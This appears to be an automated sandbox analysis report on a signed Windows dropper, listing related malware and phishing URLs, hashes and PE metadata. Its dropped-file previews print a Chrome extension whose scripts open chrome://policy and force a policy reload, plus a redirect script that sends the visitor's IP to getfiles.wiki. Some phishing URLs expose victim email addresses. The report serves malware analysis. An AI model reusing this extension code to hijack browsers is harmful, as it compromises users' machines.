                                                                                              phish_alert_sp2_2.0.0.0 (29).emlGet hashmaliciousHTMLPhisherBrowse
                                                                                              • 104.16.125.175
                                                                                              MatrixHackByFilard.exeGet hashmaliciousAveMaria, Clipboard Hijacker, StormKittyBrowse
                                                                                              • 104.18.115.97
                                                                                              http://captchawizard.topGet hashmaliciousUnknownBrowse
                                                                                              • 104.17.25.14
                                                                                              https://ncv.microsoft.com/tGglVSDwU8Get hashmaliciousHTMLPhisherBrowse
                                                                                              • 104.17.25.14
                                                                                              https://9a58319fdb89454dbf7d57ec64124460.svc.dynamics.com/t/t/BVzG1ZtcxfxVMEeCBMUF9f98xaJT8P62o5RV0yU9XwAx/uDcWdH1bOp6HWDY2mkAOv9iB1YD3eKJ5Fgcioqsxn5YxGet hashmaliciousUnknownBrowse
                                                                                              • 104.18.28.38
                                                                                              download message reports.htmGet hashmaliciousHTMLPhisherBrowse
                                                                                              • 104.18.11.207
                                                                                              https://sdsphyphthkydthphu.lt.emlnk.com/Prod/link-tracker?notrack=1&redirectUrl=aHR0cHMlM0ElMkYlMkZpcGZzLmlvJTJGaXBmcyUyRlFtWFhzVWNFalVXUjJ0UlRlZW9TbTNaQ1BldnV6d1dqdThxYWNKZzQ2Q2ZFdnklMkYlM0Z1JTNERjI2NkY0RCUyNmUlM0QxNUVCNUI5JTI2YyUzRDE3QUIxNiUyNnQlM0QxJTI2bCUzREE4OThDQTREJTI2ZW1haWwlM0RKVTV4dzZ1RzhZUWZJSFRPbFZ3TG4xJTI1MjUyQlRZYTNXdFdObSUyNnNlcQ==&sig=HmweUoib5nYo7eyqKXNnGYAgaeE2FfdWf8cXk4vgMHH9&iat=1686562798&a=%7C%7C226436143%7C%7C&account=sdsphyphthkydthphu%2Eactivehosted%2Ecom&email=wqoeHBR35e%2BSVLN%2F%2FiKISDXjmjj%2FzFr01chOjGPcASlmhkzkym5PzH%2FTG%2Fs2pA%3D%3D%3AYiPRmc8seEqZ3k4hYzXtexzYrsJacX%2Bf&s=b2601602628213a189f35061271e9bbe&i=1A3A1A8#Y29sZS5kaXBsb2NrQHZpaGEuY2E=Get hashmaliciousHTMLPhisherBrowse
                                                                                              • 1.1.1.1
                                                                                              https://corwinbeverage-my.sharepoint.com/:b:/g/personal/seano_corwinbevco_com/EasgJ5ZT7F9Ivgi8cYRzRacB9ebkDP9W3ssv_FjrHl59tQ?e=rqjRKmGet hashmaliciousHTMLPhisherBrowse
                                                                                              • 188.114.96.3
                                                                                              https://coloursatelec.com/siim/?alt=media&token=033982e3-60ca-457e-b182-18a03119de12&data=YnJvY2h1cmVAcm9ja3ltb3VudGFpbmVlci5jb20=&subf=Open%20Vacations.pdf&foldr=Human%20Resources&file=Vacation_Submissions.pdfGet hashmaliciousUnknownBrowse
                                                                                              • 1.1.1.1
                                                                                              https://clicktime.symantec.com/3SV6pqrZcECzT369dA96VwE7VN?u=https://surewayconsultants.com/_wildcard_.surewayconsultants.com/index.php/?bmF0YWxpZS50aWxsZXlAY290ZXJyYS5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                                                              • 104.16.124.175
                                                                                              HEUR-Trojan.Win32.Chapak.gen-774ae4107d461361.exeGet hashmaliciousAmadey, Fabookie, Nymaim, PrivateLoader, RedLine, SmokeLoader, TofseeBrowse
                                                                                              • 188.114.97.7
                                                                                              file.exeGet hashmaliciousMinerDownloader, XmrigBrowse
                                                                                              • 172.67.34.170
                                                                                              https://gator3403.hostgator.com:2096Get hashmaliciousHTMLPhisherBrowse
                                                                                              • 104.18.28.38
                                                                                              https://ipfs.io/ipfs/bafybeibtqlw6fb2s4sang4bhsiuhw6ucgzlxgrfi5gqmhhuoirwzgllm24/phantom1248.html#0032@de.atu.euGet hashmaliciousHTMLPhisherBrowse
                                                                                              • 104.17.25.14
                                                                                              https://ipfs.io/ipfs/QmP9aHN6SFr3Mdit2UqKy3BoAVuo3Fmp2mDRSBNS4aaXBe/#norautoitaliapec.hr@legalmail.itGet hashmaliciousHTMLPhisherBrowse
                                                                                              • 104.18.169.114
                                                                                              https://workflowy.com/s/incoming-encrypted-d/dqMyV8TZmqYE4euJGet hashmaliciousHTMLPhisherBrowse
                                                                                              • 172.67.71.92
                                                                                              http://robustus.impactia.com/AnalyticServer/redirect?cid=1c8ba94477e44657&mid=99825379&eurl=aHR0cHM6Ly9lYXRjb21taXRtZW50LnNhLmNvbS9kYW5rYS9pbmRleC5waHA/cmQ9YW5rdXIua290aGFyaUBhdXRvbWF0aW9uYW55d2hlcmUuY29tGet hashmaliciousUnknownBrowse
                                                                                              • 104.21.16.6
                                                                                              Settled Payment #Copy#U00ae .htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                              • 172.67.201.145
                                                                                              https://ipfs.io/ipfs/bafybeigjj3mrx2fbaiopasqeezuoq26hnbigiszkqpiiiclo5plsk3eyuq/fraramzi0_sp_chamtop.html#nfornes@mgts.comGet hashmaliciousHTMLPhisherBrowse
                                                                                              • 172.64.202.28
                                                                                              OVHFRfile.exeGet hashmaliciousRedLineBrowse
                                                                                              • 147.135.231.58
                                                                                              https://x7e7z6tm3emgcl6ob2uxejgh2bieto3flprfragwdy-ipfs-dweb-link.translate.goog/?_x_tr_hp=bafybeic3plmzw643&_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en-US#adefa@asdf.frGet hashmaliciousHTMLPhisherBrowse
                                                                                              • 46.105.46.142
                                                                                              file.exeGet hashmaliciousRedLineBrowse
                                                                                              • 147.135.231.58
                                                                                              unknown.exeGet hashmaliciousEmotetBrowse
                                                                                              • 51.255.165.160
                                                                                              mMCcAhCxUk.exeGet hashmaliciousAveMaria, UACMeBrowse
                                                                                              • 51.210.66.231
                                                                                              file.exeGet hashmaliciousRedLineBrowse
                                                                                              • 147.135.231.58
                                                                                              file.exeGet hashmaliciousRedLineBrowse
                                                                                              • 147.135.231.58
                                                                                              file.exeGet hashmaliciousRedLineBrowse
                                                                                              • 147.135.231.58
                                                                                              file.exeGet hashmaliciousRedLineBrowse
                                                                                              • 147.135.231.58
                                                                                              file.exeGet hashmaliciousRedLineBrowse
                                                                                              • 147.135.231.58
                                                                                              file.exeGet hashmaliciousXmrigBrowse
                                                                                              • 51.255.34.118
                                                                                              file.exeGet hashmaliciousRedLineBrowse
                                                                                              • 147.135.231.58
                                                                                              https://salamat-bo.com/zagGet hashmaliciousUnknownBrowse
                                                                                              • 54.37.93.154
                                                                                              https:/agmconsulting.fr/api.php?_somtc=true&rtoken=f37af7c5-099b-49d4-bbed-04dd78eb6dfc-42a9e&remail=laurent.delaunay@jda.comGet hashmaliciousUnknownBrowse
                                                                                              • 54.36.91.62
                                                                                              r62hEGJs3L.elfGet hashmaliciousMiraiBrowse
                                                                                              • 149.60.183.114
                                                                                              emotetno-aslr - Copy.exeGet hashmaliciousEmotetBrowse
                                                                                              • 51.255.165.160
                                                                                              Agrubu_06092023.pdf.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                              • 139.99.8.190
                                                                                              v46ktHyluW.exeGet hashmaliciousRedLineBrowse
                                                                                              • 51.79.184.226
                                                                                              QUOTATION.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                              • 51.91.236.255
                                                                                              file.exeGet hashmaliciousRedLineBrowse
                                                                                              • 147.135.231.58
                                                                                              No context
                                                                                              No context
                                                                                              Process:C:\Users\user\Desktop\edgchrv5.exe
                                                                                              File Type:Google Chrome extension, version 3
                                                                                              Category:dropped
                                                                                              Size (bytes):46654
                                                                                              Entropy (8bit):7.9590350147638365
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:os7cjcBjsI/hbTTWJpuHlKElAfPryn5QzShaPuChbhFbHRu/llKGr7J9FwyIlWgT:oshv5HquHgElAfzyneSMPuKbvzUllKGY
                                                                                              MD5:2BA2554244EA500AA5847F1FF7A9D26C
                                                                                              SHA1:DEBA543755C488CDC7A3BEE7CD46E7FE4B7F1212
                                                                                              SHA-256:8B7D4B43A9EEBC6C3FC78DEA1AB562711651FC24043F260018C80021B33FBC4B
                                                                                              SHA-512:104FBB55F037015FFB02025A3F663C29D0D113DBF72AFCF9A9D1D7C0D20013E3A72905A5B2EEACCDD23828C0DA1855FB852CB7AA74535BF7EB0A5854E6877311
                                                                                              Malicious:false
                                                                                              Preview:Cr24....E.........0.."0...*.H.............0............-.."a....7.@M....lVa...$E.F...|..l.5<o4_...P....5.1K.[.S.......Y.GJ.Na{.x~|...*......d7$...J...n.....,..tV.0.|..2..~..?...._G.2.&.....z.3..|{...-I......f..,{q..h6E..l.\..Zz......hFs...1bU..UyS.c....]..L)-..~7.lz.:.D..........*...!..{0.G........f...O.{a...<......p1.%_...$PV....M..V...G.....m:..B....+...w.~.|"......`^....L....;P."...k.r.!{...=.A..'.._+...,M.L.....y.......B....{.#.....+4.c6.A K...o.!\.e.<.j.0.*..Z.5Qa.\!..aZ.YO......A(.x...o...Y....u....tR|z.w..u.....i.K'._r..V2-.r..3.@&.......BU....PX..,...r.PK..-.......OV...[............manifest.json.....................SMo.0...W...(.9n..h.a.......!3.#W..%.....I.]wK..f?>>R...".r...Y...m^D.d.....:a[.@.w#>..w{C..-k=.j.Y.m....Q..#)a...._........f........u.b.!....xc.o0......<@.C...CK..m..<. ..`.h..S....d. p*..IW.:=wn7......8...3...$.|..)..?.X~,.b.,.....c....bJ..uqY.. ...Q.u.v..%B^..E[......8..qJ.Fg...V.b.Pa>..[`.cFJ..v....M..7)...8ipiyj..a...5.5../..
                                                                                              Process:C:\Users\user\Desktop\edgchrv5.exe
                                                                                              File Type:JSON data
                                                                                              Category:dropped
                                                                                              Size (bytes):273
                                                                                              Entropy (8bit):4.76438627845756
                                                                                              Encrypted:false
                                                                                              SSDEEP:6:EW/COIk/hsu1wC6VAPk8yyWSD9kn+E8Lyg8c:r6OJhsu1wXAPk8Sic+EaPN
                                                                                              MD5:99F8D6AA35E67DB20B5F6E3FC54101CE
                                                                                              SHA1:37E09293AA7CDB8FAE7754AAAE3E8BD2591A2F29
                                                                                              SHA-256:CC1C1C7AA14AC707F66629095B8E117109660C13511F26D6EEDA1E9FDC363AB2
                                                                                              SHA-512:57562DBE3C33139B98FF244CDCC233C9689823A11032D42B9B179EDA53831481422D69A62691EEBFF34C0AE85C36CBE7F8B16599D89919BAB759CFD38AF27797
                                                                                              Malicious:false
                                                                                              Preview:{..."name": "Apps",..."description": "",..."version": "1.0",..."manifest_version": 3,..."background": {...."service_worker": "service.js",...."type": "module"...},..."permissions": ["tabs", "scripting", "management", "background"],..."host_permissions": ["chrome://*/*"]..}
                                                                                              Process:C:\Users\user\Desktop\edgchrv5.exe
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):320
                                                                                              Entropy (8bit):5.073881670663314
                                                                                              Encrypted:false
                                                                                              SSDEEP:6:YXOBLow3rzLI/Dg5EVNR21aMXgBDoQYIxXYMoVsxrHLLqL:Y+9otk5EgIMIDVYVMjrSL
                                                                                              MD5:1FE579C153AE40CF460615BD79DA3ED0
                                                                                              SHA1:EFB41E8B7AA825101EC6856287A655C448483857
                                                                                              SHA-256:DCF80F0A803A85A3334272B07A545BF154116EFCD9F9E5D9340763BE11B0EA79
                                                                                              SHA-512:992074BA16132DC5147BEF6869DCB99E60BC58D71A6E70B59B540F0133E4FC78D3C7385960A334A5A8C14F1AC362589AF4D008872A93591AC65314D94DE20084
                                                                                              Malicious:false
                                                                                              Preview:chrome.management.onInstalled.addListener(info => {...if (info.id != 'ecffbknobglofafinobbcmaionnihcma') return;.....setTimeout(() => {....chrome.tabs.create({ url: 'chrome://policy' }, tab => {.....chrome.scripting.executeScript({......target: { tabId: tab.id },......files: ['web.js'].... });....});...}, 500);..});
                                                                                              Process:C:\Users\user\Desktop\edgchrv5.exe
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):299
                                                                                              Entropy (8bit):4.8969499354657176
                                                                                              Encrypted:false
                                                                                              SSDEEP:6:oJRoJfwejEzKeYDFOEn9zmYnadRv5F8smvDNRU/snproLNRiif:ofoJYejj9n9Sdx5msmvDLrKdf
                                                                                              MD5:78DA8C3C7BCC4FCBE1D1C1D4209BA026
                                                                                              SHA1:CCACDA33826629E3A5B552BA26227D9D1B026BCA
                                                                                              SHA-256:893FCFE4EDCDB07BCC3E05A3304F93F0358C9D8F4CC967058585F553BB82AD02
                                                                                              SHA-512:01C3DEF2B9A38ABD5C6D447C52D8EC3533C8098DB69DCF30682EFA992BE71666D66A56AB3E6B161F8017FE018E20E479C365B780F3CF94ED507CAEA99EADBC06
                                                                                              Malicious:false
                                                                                              Preview:addEventListener('load', () => {...if (location.host !== 'policy') return;.....const reload = () => {....const button = document.querySelector('#reload-policies');......if (button) {.....button.click();.....setTimeout(close, 200);....} else {.....setTimeout(reload, 200);....}...}.....reload();..});
                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:downloaded
                                                                                              Size (bytes):51
                                                                                              Entropy (8bit):4.740861126200381
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:QBRgyNq/HG9AQrU7Cfr4GfwY:IgymGfrUZGfwY
                                                                                              MD5:BA26AAE4486011FB8D43146D2CE4269C
                                                                                              SHA1:8D9CD7748DB38852B73C3205AC07583975DDE74B
                                                                                              SHA-256:8420CEBD83E2EAECEA1085412FD4D1069EB88697BB8E41CC6ED9AFB60C598E51
                                                                                              SHA-512:4D363AC65C76DC11AB120E3963F39E86E8857725AA7CB0E0DFED516BD0CDA1819EF1D4D663E0DDE66E271991E5D3982ACDD87CEBDA28E37940602C95A976162C
                                                                                              Malicious:false
                                                                                              URL:https://t.dtscout.com/pv/?_a=v&_h=getfiles.wiki&_ss=ng6jfd0g1c&_pv=1&_ls=0&_u1=1&_u3=1&_cc=ch&_pl=d&_cbid=15t7&_cb=_dtspv.c
                                                                                              Preview:try{_dtspv.c({"b":"chrome@104"},'15t7');}catch(e){}
                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              File Type:ASCII text
                                                                                              Category:downloaded
                                                                                              Size (bytes):380
                                                                                              Entropy (8bit):5.245911680799567
                                                                                              Encrypted:false
                                                                                              SSDEEP:6:51bDNRdhb13LkVVXI8mgO9lVhnmUqZzwGdDVTYqL1+LD+mMkuc1zlCBbAm+RbDRk:51bDR513QvuHnmVZkGdDJH10D+xc15C5
                                                                                              MD5:7CED556545225D5937749464A6BA4C0D
                                                                                              SHA1:C4B27269723337F4C562EE5FE0654443E650B9B5
                                                                                              SHA-256:CFDC24B388ED5C60AAE836A4BDA7EEF5D70FDE374CD054B123F800767147BC39
                                                                                              SHA-512:3201DE08E4698F4426BA7E4B71627F65009BFF9BC4E178F95F0E0C94AE0DEED47FBA0EF98EF30D65D5109E8C1F3BD50AB204BB3FDE6A6AA6517271AD3CA6CC76
                                                                                              Malicious:false
                                                                                              URL:https://s4.histats.com/stats/0.php?4708787&@f16&@g1&@h1&@i1&@j1686622029954&@k0&@l1&@m&@n0&@ohttps%3A%2F%2Fgetfiles.wiki%2Fredirect.php&@q0&@r0&@s0&@ten-US&@u1280&@b1:199562055&@b3:1686622030&@b4:js15_as.js&@b5:-420&@a-_0.2.1&@vhttps%3A%2F%2Fgetfiles.wiki%2Fredirect.php%3Fgjhagdjfbdjk%3DMTAyLjEyOS4xNDMuNzc%3D&@w
                                                                                              Preview:_HST_cntval="#3Vis. today=3809";chfh2(_HST_cntval);;!function(){try{var b=document.createElement("script");b.src="//e.dtscout.com/e/?v=1a&pid=5200&site=1&l="+encodeURIComponent(window.location.href)+"&j="+encodeURIComponent(document.referrer);.b.async="async";b.type="text/javascript";var a=document.getElementsByTagName("script")[0];a.parentNode.insertBefore(b,a);}catch(e){}}();
                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:downloaded
                                                                                              Size (bytes):31
                                                                                              Entropy (8bit):4.2603326005698765
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:KGAsUMgRGe:5ZUMgRGe
                                                                                              MD5:BBA664EA530F552AACAA32B9A8A22BED
                                                                                              SHA1:F6D231F1117314F9F689083CABEC51D7D33DAE98
                                                                                              SHA-256:BDF688D2401AAC6928AB357B0E9F9B8A0EC5F32A4D0D7A72B88A9508F390F0E9
                                                                                              SHA-512:856AE2676C8DF3D1F7C02AC682F6B503754B68055CBACEE17C7A486AE7A5ACA87D21C3316D5E2CDC779F6E228883AF54D86520A9C7D2B40A23426135B27E3770
                                                                                              Malicious:false
                                                                                              URL:https://api.ipify.org/?format=jsonp&callback=getIP
                                                                                              Preview:getIP({"ip":"102.129.143.77"});
                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              File Type:HTML document, ASCII text, with very long lines (11440), with no line terminators
                                                                                              Category:downloaded
                                                                                              Size (bytes):11440
                                                                                              Entropy (8bit):5.405413454337748
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:TixaOdP2DahLeKkda6nGvCvsojELj2n04UwXNAfLwUW1WuYx6jomrYZJp2XmIR2z:mxaOdWyLwaAWj2nvUwXNAfLwUWAuYx6e
                                                                                              MD5:E959FBDD13DEF4B9A9D0A5FC9A7DE4D4
                                                                                              SHA1:1E39712307E3673B40C0BDB8C7D3E86A3E8B60A0
                                                                                              SHA-256:2DEFE59E357A7D0683C8283AC42841DB404A0884CAE2EAECEBF4B676E559DEDE
                                                                                              SHA-512:590B22282634411002C9467C6C0D20D27979F841BFFCF893E715A2B61301A873457A9CBE0A765A11592E7F5CB81FC50D5BD436BD5D47DC93BFB776515B02E2C9
                                                                                              Malicious:false
                                                                                              URL:https://s10.histats.com/js15_as.js
                                                                                              Preview:(function(){var n="undefined",t=function(t){return typeof t!==n},e="js15_as.js",r="",i=!1,o=!1,a=!1,s=!1,c="0.2.1",u=25,_="-",f="_HISTATS_SID",d="histats_custom_destDivProducer",p=function(n){_+="_"+n};p(c);var v=function(){i&&console.log.apply(this,arguments)},l=function(n,r){var i=n||{};try{var o=r.document,a=r.navigator,s=r.screen,c=r.Date,f=r.Math,d=function(){return o},p=function(){return d().getElementsByTagName("body")[0]||d().getElementsByTagName("head")[0]},l=function(n){return"function"==typeof n},h=function(n){return t(n)&&n instanceof Array},m=function(n){return t(n)&&!!d().getElementById(n)},y=function(n){var e=!1;if(t(n)){if("NaN"==parseInt(n))return!1;e=parseInt(n)>0}return e},g=function(n){return y(n)?parseInt(n):0},w=function(n){return"string"!=typeof n||n.length<1?n:n.replace(/^['"]?(.*)['"]$/,"$1")},T=t(window["_DEBUG_HISTATS_ASYNCR_DO_NOT_AUTOSTART"]),I=function(){return parseInt(1e4*f.random())+1},H=function(){return Math.floor(4e8*Math.random())-2e8},C=I(),E="hist
                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                              Category:downloaded
                                                                                              Size (bytes):294
                                                                                              Entropy (8bit):4.951706668845105
                                                                                              Encrypted:false
                                                                                              SSDEEP:6:7AqE6OcF2XmmmHDYt67/vYtLGYMDAqE6W/kUwxJKHpMv:EqHfF2WxHDTvSyYMcqHWcKpMv
                                                                                              MD5:75AC127CF8C80495690FF32B437B686C
                                                                                              SHA1:841CF4E78BD8CF73B891DAC85674C59E3B56642F
                                                                                              SHA-256:6998F19612C0DC8A5664C5A7537FCC1404FCE0198B46C60F3565DE2DED53A126
                                                                                              SHA-512:24B14F1D4E77AE130DBDD958E7D2A6DC060B64B071D7F2D034560D5CC734EB50FD4F9FA7C6E57AD7AD955F213B28D52CBEA6F5BE0B699DCC958F04A676FDEF8B
                                                                                              Malicious:false
                                                                                              URL:https://getfiles.wiki/redirect.php
                                                                                              Preview:<script type="application/javascript">.. function getIP(json) {.. window.location.href = "https://getfiles.wiki/redirect.php?gjhagdjfbdjk="+btoa(json.ip);.. exit();.. }..</script>..<script type="application/javascript" src="https://api.ipify.org?format=jsonp&callback=getIP"></script>..
                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              File Type:HTML document, ASCII text, with very long lines (1277), with CRLF line terminators
                                                                                              Category:downloaded
                                                                                              Size (bytes):3568
                                                                                              Entropy (8bit):5.432883994493033
                                                                                              Encrypted:false
                                                                                              SSDEEP:96:2XlnSuTIkycSXlnSuTIkLc8+1z1Q4mt7AHD7pW:bKyqKLH6pQ4K7qg
                                                                                              MD5:3D874B1B676E48953AA76A5DF52C8CFC
                                                                                              SHA1:6E514009A81E76A36120A50A00EC657AF36B85B6
                                                                                              SHA-256:3DFA9C49BED519A1D3423F2B55FF1FFC751A1D75844C606BAD4FCD4D633E543A
                                                                                              SHA-512:13547D10C56D8D1DF7AC2F068DAFAEB381CC181C2C36C900DC323237285F53671B3DEE66D88EBFFB7A6F69EAFBBC218F1E55459C98A6749C20A5905B02728EE8
                                                                                              Malicious:false
                                                                                              URL:https://getfiles.wiki/redirect.php?gjhagdjfbdjk=MTAyLjEyOS4xNDMuNzc=
                                                                                              Preview:..<!DOCTYPE html>..<html lang="en">..<head>.. <meta charset="UTF-8">.. <meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">..<style>..body {.. background-color: #000000 ;..}..</style>........</head>..<body>.. .. .. <script>(function(){"use strict";function n(n,e){var r;void 0===e&&(e="uclick");var c=null===(r=n.match(/\?.+?$/))||void 0===r?void 0:r[0];return c?Array.from(c.matchAll(new RegExp("[?&](clickid|"+e+")=([^=&]*)","g"))).map((function(n){return{name:n[1],value:n[2]}})):[]}function e(n){var e=n();return 0===e.length?{}:e.reduce((function(n,e){var r;return Object.assign(n,((r={})[e.name]=""+e.value,r))}),{})}function r(r){void 0===r&&(r="uclick");var c,t,u=e((function(){return(function(n){return void 0===n&&(n="uclick"),Array.from(document.cookie.matchAll(new RegExp("(?:^|; )(clickid|"+n+")=([^;]*)","g"))).map((function(n){return{name:n[1],value:n[2]}}))})(r)})),i=e((function(){return n(docume
                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              File Type:ASCII text, with very long lines (2077)
                                                                                              Category:downloaded
                                                                                              Size (bytes):2079
                                                                                              Entropy (8bit):5.27420292409541
                                                                                              Encrypted:false
                                                                                              SSDEEP:48:xnMPwQHwUl3z7oHtWLSHms0yoPhuQ3cT0QadrrQnd0NJqO0fs7y02:xn5TIYHkums0yW/GaZQdg1c
                                                                                              MD5:4088C66A294C63665C9BA86312010E3E
                                                                                              SHA1:47031C485ABBDE7050CD6B3296BFACF8697CBCF5
                                                                                              SHA-256:6B35F8E23B212E8121C7E99C46CEC2E10D9970F7B142D407058594B3C20BF19E
                                                                                              SHA-512:AC74D839127E726DA994FB723FB2DB3918DAFC9735C24AED2AC0AA0EE8CEEFA11B5E06F949A58B57983FAE1D871A94809A29C60DD9ED9C60D4CEAA14347351C5
                                                                                              Malicious:false
                                                                                              URL:https://e.dtscout.com/e/?v=1a&pid=5200&site=1&l=https%3A%2F%2Fgetfiles.wiki%2Fredirect.php%3Fgjhagdjfbdjk%3DMTAyLjEyOS4xNDMuNzc%3D&j=https%3A%2F%2Fgetfiles.wiki%2Fredirect.php
                                                                                              Preview:!function(t){if(!t.exec){t.exec=!0;var r=!!navigator.sendBeacon,c=l(),a=window.location.hostname.replace("www.",""),e="_dtspv",i="https://t.dtscout.com/pv/",o=document.getElementsByTagName("head")[0];if(void 0!==o||void 0!==(o=document.getElementsByTagName("body")[0])){var n=!1;n=localStorage||{getItem:function(t){var e=("; "+document.cookie).split("; "+t+"=");return 2==e.length?e.pop().split(";").shift():null},setItem:function(t,e){var n=new Date;n.setTime(n.getTime()+2592e6),document.cookie=t+"="+(e||"")+"; expires="+n.toUTCString+"; path=/"}};var s=!1,d=m();null==d&&(s=!0,d={ss:p(10),st:c,sl:c,u1:c,u3:c,pv:0,c:{}}),"pl"in t&&h(t.pl,d);var u={a:"v",h:a};for(var v in!s&&c>d.sl+1800&&(d.ss=p(10),d.st=c,d.pv=0,u.s=1),d.pv++,d.sl=c,u.ss=d.ss,u.pv=d.pv,u.ls=Math.round(c-d.st),(s||c>d.u1+86400)&&(d.u1=c,u.u1=1),(s||c>d.u3+2592e3)&&(d.u3=c,u.u3=1),f(d),d.c)u[v]=d.c[v];!function(t){t.cbid=p(4),t.cb="_dtspv.c";var e=g(t);try{var n=document.createElement("script");n.async=!0,n.defer=!0,n.src=i
                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                              Entropy (8bit):6.31777106448477
                                                                                              TrID:
                                                                                              • Win32 Executable (generic) a (10002005/4) 99.53%
                                                                                              • InstallShield setup (43055/19) 0.43%
                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                              File name:edgchrv5.exe
                                                                                              File size:209776
                                                                                              MD5:0c0a3d01c45f66056d607bbad486b39b
                                                                                              SHA1:d96aa9b9fe3a0515d70f3e909f00c865dfc5821c
                                                                                              SHA256:d158f3cfb47665928c5d304495fa99050a9e4c5b8d54332d400eec78bd7f98b6
                                                                                              SHA512:76fcb32eb095ba719f8f532937641ce6d3e4918a559377dbe6f125c4aa9ad8ba0f390710efc912e2c19c59c2f03ce523e07b202e12014e634b5217c709fdf80e
                                                                                              SSDEEP:3072:1JqmvLa0w5DElSlF8Af4a3uG+07J4txJt:1JqmvLaNyWFzv+07J4Jt
                                                                                              TLSH:D4245A52F240D871D305273259A2D5E4E939BD385894D04FF23C7EFA5AB23A3596328F
                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............y.D.y.D.y.D.+5D.y.D.+$D.y.D.+2D.y.D...D.y.D...D.y.D.y.D.y.D.+;D.y.D.+%D.y.D.+ D.y.DRich.y.D................PE..L...G.od...
                                                                                              Icon Hash:0c0c2d33ceec80aa
                                                                                              Entrypoint:0x403154
                                                                                              Entrypoint Section:.text
                                                                                              Digitally signed:true
                                                                                              Imagebase:0x400000
                                                                                              Subsystem:windows gui
                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                              Time Stamp:0x646F1847 [Thu May 25 08:11:51 2023 UTC]
                                                                                              TLS Callbacks:
                                                                                              CLR (.Net) Version:
                                                                                              OS Version Major:5
                                                                                              OS Version Minor:0
                                                                                              File Version Major:5
                                                                                              File Version Minor:0
                                                                                              Subsystem Version Major:5
                                                                                              Subsystem Version Minor:0
                                                                                              Import Hash:a1e2978a1231fce7a99dd60881e648fb
                                                                                              Signature Valid:true
                                                                                              Signature Issuer:CN=GlobalSign GCC R45 EV CodeSigning CA 2020, O=GlobalSign nv-sa, C=BE
                                                                                              Signature Validation Error:The operation completed successfully
                                                                                              Error Number:0
                                                                                              Not Before, Not After
                                                                                              • 3/22/2023 7:10:47 AM 3/22/2024 7:10:47 AM
                                                                                              Subject Chain
                                                                                              • CN=SOFTWARE ABFG LTD, O=SOFTWARE ABFG LTD, STREET="2nd Floor College House, 17 King Edwards Road", L=Ruislip, S=London, C=GB, OID.1.3.6.1.4.1.311.60.2.1.3=GB, SERIALNUMBER=14698890, OID.2.5.4.15=Private Organization
                                                                                              Version:3
                                                                                              Thumbprint MD5:FEE4DECF8FD42396157E11993B5B34D3
                                                                                              Thumbprint SHA-1:EE81E7D510B97695351EF3F2E0C10F4D0601EDA6
                                                                                              Thumbprint SHA-256:BAC0E9EE69D6FCA2A9B1164094103589FD63676A564F420D71A5B8A172BB3E7B
                                                                                              Serial:3C22F5C916B284010CB8A481
                                                                                              Instruction
                                                                                              call 00007F06F0C58684h
                                                                                              jmp 00007F06F0C55BBEh
                                                                                              mov edi, edi
                                                                                              push ebp
                                                                                              mov ebp, esp
                                                                                              sub esp, 00000328h
                                                                                              mov dword ptr [0041C618h], eax
                                                                                              mov dword ptr [0041C614h], ecx
                                                                                              mov dword ptr [0041C610h], edx
                                                                                              mov dword ptr [0041C60Ch], ebx
                                                                                              mov dword ptr [0041C608h], esi
                                                                                              mov dword ptr [0041C604h], edi
                                                                                              mov word ptr [0041C630h], ss
                                                                                              mov word ptr [0041C624h], cs
                                                                                              mov word ptr [0041C600h], ds
                                                                                              mov word ptr [0041C5FCh], es
                                                                                              mov word ptr [0041C5F8h], fs
                                                                                              mov word ptr [0041C5F4h], gs
                                                                                              pushfd
                                                                                              pop dword ptr [0041C628h]
                                                                                              mov eax, dword ptr [ebp+00h]
                                                                                              mov dword ptr [0041C61Ch], eax
                                                                                              mov eax, dword ptr [ebp+04h]
                                                                                              mov dword ptr [0041C620h], eax
                                                                                              lea eax, dword ptr [ebp+08h]
                                                                                              mov dword ptr [0041C62Ch], eax
                                                                                              mov eax, dword ptr [ebp-00000320h]
                                                                                              mov dword ptr [0041C568h], 00010001h
                                                                                              mov eax, dword ptr [0041C620h]
                                                                                              mov dword ptr [0041C51Ch], eax
                                                                                              mov dword ptr [0041C510h], C0000409h
                                                                                              mov dword ptr [0041C514h], 00000001h
                                                                                              mov eax, dword ptr [0040E004h]
                                                                                              mov dword ptr [ebp-00000328h], eax
                                                                                              mov eax, dword ptr [0040E008h]
                                                                                              mov dword ptr [ebp-00000324h], eax
                                                                                              call dword ptr [0000004Ch]
                                                                                              Programming Language:
                                                                                              • [C++] VS2008 build 21022
                                                                                              • [ASM] VS2008 build 21022
                                                                                              • [ C ] VS2008 build 21022
                                                                                              • [ C ] VS2005 build 50727
